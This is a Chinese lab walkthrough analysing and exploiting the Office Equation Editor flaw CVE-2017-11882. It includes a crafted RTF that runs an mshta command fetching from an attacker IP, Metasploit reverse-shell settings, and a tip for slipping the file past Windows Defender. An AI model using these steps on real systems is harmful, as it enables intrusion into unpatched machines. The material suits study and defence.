文章目录

  • 0x01 漏洞环境
  • 0x02 漏洞成因
  • 0x03 影响漏洞版本
  • 0x04 分析过程
    • 漏洞溢出点
    • 动态分析
  • 0x05 利用过程
    • 弹出网页
    • msf配置
    • 攻击方和被攻击方进行通讯
    • 攻击pc445端口
  • 0x06 生成攻击文件
    • msf
    • 开始攻击
  • 0x07 结果

0x01 漏洞环境

Kali Linux 2017.03 + Windows 7 + Office 2016
渗透机:Kali Linux + POC代码
靶机:Win7 + Office 2016
EQNEDT32.EXE实际上是一个com组件,是一个标准的接口,com组件:会实现一些接口,Windows下特殊exe实现了一些接口是让其他exe调用的接口,用python的rtfobg这个组件进行查看,需要在python中安装ole这个库要用xp因为win7下找不到好的jmp esp

0x02 漏洞成因

如果样本弹出了计算器,那么一定会存在打开进程的API,常见API有这几个:
① WinExec
② ShellExecute
③ CreateProcess
样本运行结果
查看这个计算机是什么进程调用的,是office2003的计算公式调用的

0x03 影响漏洞版本

Microsoft Office 2000
Microsoft Office 2003
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2
Microsoft Office 2013 Service Pack 1
Microsoft Office 2016

0x04 分析过程

漏洞溢出点

用od附加这个进程CreateProcessA下断点,,cmd.exe是用命令行启动个计算器,
栈中往上拉,call 创建进程时返回地址来自kernel32因此不是CreateProcessA启动的,因此查看k是WinExec这个启动的,也就是在溢出时执行的是WinExec,,,因此堆栈可能被破坏的因此要对WinExec下断点
##定位漏洞函数
414141和430c18是自己构造的,430c18是返回地址,往上拉看到gid,41160f断点
断点下好后,数据窗口中跟随查看12f1b8-12f1cc这里面什么时候变成41
覆盖的指令

动态分析

0x05 利用过程

弹出网页

漏洞利用的步骤

  1. 定立目标:弹出一个网页
    2.编写 shellcode修改样本中的执行字符串改为cmd.exe /c explorer.exe http://www.15pb.co
    3.处理好的字符串:636D642E657865202F63206578706C6F7265722E65786520687474703A2F2F7777772E313570622E636F0D0A进行样本的覆盖
    4、或者进行od的动态修改:要在这个函数出来时候进行修改

msf配置

①更新 Metasploit
结果:apt update; apt install metasploit-framework
②启动msf
启动 msf:进入msf:msfconsole,也就是大msf按table补全
③安装所需模块
cve-2017-11882.rb这个模块拷贝到指定文件夹中cd cve-2017-11882.rb /usr/share/metasploitframework/modules/exploits/windows/fileformat
如果命令拷贝不成功,则进行手动拷贝
④重启
模块拷贝成功需要重新启动msf,要不这个模块无法生效
##攻击PC环境
cve-2017-11882这个模块适合win7 32位的操作系统,smb_ms_170这个模块适合win7 64位操作系统,实验用于win7 32位操作系统,也就是cve-2017-11882这个模块
##查看ip
查看kail的ip:重亲打开个终端ifconfig 出来ip是192.168.0.200
查看win7的ip,Win7要把防火墙关掉:
192.168.0.176

攻击方和被攻击方进行通讯

首先要在同一个网段上,kail:192.168.0.200,,,查看win7的ip,Win7要把防火墙关掉:
192.168.0.176 看这俩个机器是否能ping通,,在kail上ping 192.168.0.176,在Win7上ping 192.168.0.200
kail在新打开的终端上进行ping

攻击pc445端口

win7 32位操作系统的445端口是否打开netstat -ano -p tcp | find “445” >nul 2>nul && echo 445
netstat -an 或者是netstat -ano

0x06 生成攻击文件

桌面除了rb还有pyth脚本,pryth是这条指令写进去
下边命令ip是kail
python CVE-2017-11882.py -c “mshta.exe http://192.168.0.200:8080/11882” -o 1.rtf ,,, -c是要输出的指令,1.rtf是生成的
右键1.rtf压缩这个文件夹要不就给杀掉,windows defat,1.rtf拷贝到Win7下的双击
将压缩好的1.zip拷贝到真机,拷贝到要攻击的pc上,

msf

search 漏洞利用模块命令: search cve-2017-11882
使用对应漏洞利用模块
use exploit/windows/fileformat/cve-2017-11882
设置漏洞利用信息
包括 payload 类型、IP、端口等set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.200(Kail 系统的 IP)
set lport 4444
set uripath 11882 设置路径访问时候192.168.0.95:8080/11882这样进行访问的
show options(显示必要设置的选项,查看有无漏

开始攻击

Exploit/run,等待后门程序回连,然后攻击的pc要打开1.rtf

0x07 结果

# 0x07 参考文献
[1]《高端调试》张银奎 著
[2]《0day安全:软件漏洞分析技术(第2版)》 王清 著

Microsoft Office公式编辑器(CVE-2017-11882)漏洞分析报告相关推荐

  1. Office 2003 sp3(CVE-2012-0158)漏洞分析报告

    文章目录 Office 2003 sp3(CVE-2012-0158)漏洞分析报告 1.漏洞背景 2.漏洞成因 2.1 触发漏洞 2.2 定位漏洞模块 2.3 定位漏洞函数 2.4 分析漏洞成因 2. ...

  2. RiskSense Spotlight:全球知名开源软件漏洞分析报告

     聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 RiskSense 公司最近发布了关于全球当前知名开源软件 (OSS) 的漏洞分析报告.奇安信代码卫士团队编译如下.   摘要 开源软 ...

  3. CVE-2017-11882漏洞分析报告

    漏洞简介: 软件名称及版本:Microsoft Office2016以下 漏洞模块:EQNEDT32.EXE 漏洞编号:CVE-2017-11882 危害等级:高危 漏洞类型:缓冲区溢出 威胁类型:远 ...

  4. 安天移动安全发布“大脏牛”漏洞分析报告(CVE-2017-1000405)

    一.背景简介 脏牛漏洞(CVE-2016–5195)是公开后影响范围最广和最深的漏洞之一,这十年来的每一个Linux版本,包括Android.桌面版和服务器版都受到其影响.恶意攻击者通过该漏洞可以轻易 ...

  5. 用哪种语言写的应用漏洞最严重?六大主流语言代码漏洞分析报告出炉

    来源:机器之心 本文约1600字,建议阅读5分钟 静态代码分析安全公司 Veracode 近日发布了一份应用程序分析报告,结果发现比起 JavaScript 和 Python 等语言,C++ 和 PH ...

  6. 比葫芦娃还可怕的百度全系APP SDK漏洞 - WormHole虫洞漏洞分析报告

    瘦蛟舞 · 2015/11/02 10:50 作者:瘦蛟舞,蒸米 "You can't have a back door in the software because you can't ...

  7. 某office前台任意文件上传漏洞分析

    X微e-office的那个前台任意文件上传漏洞已经被爆出一段时间了,相关的漏洞利用脚本甚至是漏洞批量利用脚本 也有很多.在这里根据系统代码结合POC来分析一下这个漏洞点. 定位漏洞点 [私信回复&qu ...

  8. 暴雷(CVE-2012-1889)漏洞分析报告

    软件名称:Microsoft Internet Explorer 软件版本:6.0/8.0 漏洞模块:msxml3.dll 模块版本: 编译日期:2022-07-06 操作系统:Windows XP/ ...

  9. WiFi网络WPA2 KRACK漏洞分析报告

    摘要: 作者:东帆@阿里安全技术平台团队 -------- 0x00 漏洞概述 安全研究员Mathy Vanhoef发现的WPA2协议的KRA(Key Reinstallation Attacks)漏 ...

  10. 金融行业安全漏洞分析报告

    报告介绍 互联网+时代的到来,人们充分享受新时代科技创新成果的便利同时,万物互联带来的信息安全风险也日渐提高,信息泄密事件层出不穷,在资金体量庞大.用户信息集中.安全隐患影响深远的金融领域,所面临的安 ...

最新文章

  1. PostgreSQL(一)PostgreSQL一主二从集群部署
  2. php 获取301 302的真实地址
  3. superviseddescent (SDM C++11实现)环境配置
  4. jmeter java接口,jmeter并发测试java接口 | 学步园
  5. 笔记本如何与其他计算机共享,笔记本电脑怎么和手机共享文件
  6. SQL DATEADD (Transact-SQL)根据需要返回时间,
  7. JVM Java内存区域 与 内存溢出 (系列号1)
  8. 09年最值得期待7大IT收购:思科收购VMware
  9. Linux-安装python3环境
  10. PDF转word神器还支持更多格式,文件小运行又快!!
  11. Energyplus运行提示缺失.OCX文件的解决方法
  12. 二维数组传参 实例详解
  13. 电偶极子场强分布与电偶极矩的引进_物理量引进_电磁学
  14. HQChart使用教程60-新版k线训练使用教程
  15. 七号信令监测系统培训手册
  16. java面试题大合集
  17. Java自动化测试系列[v1.0.0][TestNG测试开发环境配置]
  18. 淘宝“蓝鲸计划”细节内容曝光 收编谷歌中国资源
  19. PDF阅读软件里面的小手工具打开/关闭
  20. Mysql报错Table ‘blog.user‘ doesn‘t exist

热门文章

  1. 2020-11-10 oracle 数据库sql 之decode函数
  2. 51单片机彩灯控制器的设计(含源代码、编译过的 HEX 文件以及仿真图)
  3. 【八方位云台控制器】
  4. 免费JSON格式的服务接口
  5. (一) CPU 性能测试 (压力)
  6. Java项目:SSM的校园二手交易平台
  7. Vitis下Linux应用程序开发流程
  8. 【第四章】详解Feign的实现原理
  9. 计算机无法安装网卡驱动,实在无法安装电脑驱动的解决办法
  10. 基于OpenCv的人脸识别系统设计